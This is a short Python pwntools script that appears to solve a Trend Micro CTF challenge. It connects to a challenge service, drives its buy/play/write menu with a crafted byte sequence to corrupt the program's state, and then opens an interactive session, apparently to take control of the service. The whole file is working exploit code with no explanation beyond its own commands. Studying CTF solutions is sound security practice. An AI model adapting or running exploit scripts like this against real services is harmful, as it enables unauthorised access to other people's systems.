from pwn import *

#s = remote('quest1.ctf.trendmicro.com',4017)
s = remote('192.168.0.78',4017)
def buy(index, dat):
  s.recvuntil('>')
  s.sendline('1')
  s.recvuntil('>')
  s.sendline(str(index))
  s.recvuntil('?')
  s.sendline(dat)
def play(index, dat):
  s.recvuntil('>')
  s.sendline('3')
  s.recvuntil('>')
  s.sendline(str(index))
  s.recvuntil('>')
  s.sendline(str(dat))
def write(index,dat):
  s.recvuntil('>')
  s.sendline('3')
  s.recvuntil('>')
  s.sendline(str(index))
  s.recvuntil('>')
  s.sendline('10')
  s.recvuntil('>')
  s.sendline(dat)
def info(index):
  s.recvuntil('>')
  s.sendline('2')
  s.recvuntil('>')
  s.sendline(str(index))
raw_input()
buy(4,'n')
play(0,6)
buy(2,'n')
write(1,'\x0f')
buy(4,'n')
play(2,13)
s.interactive()
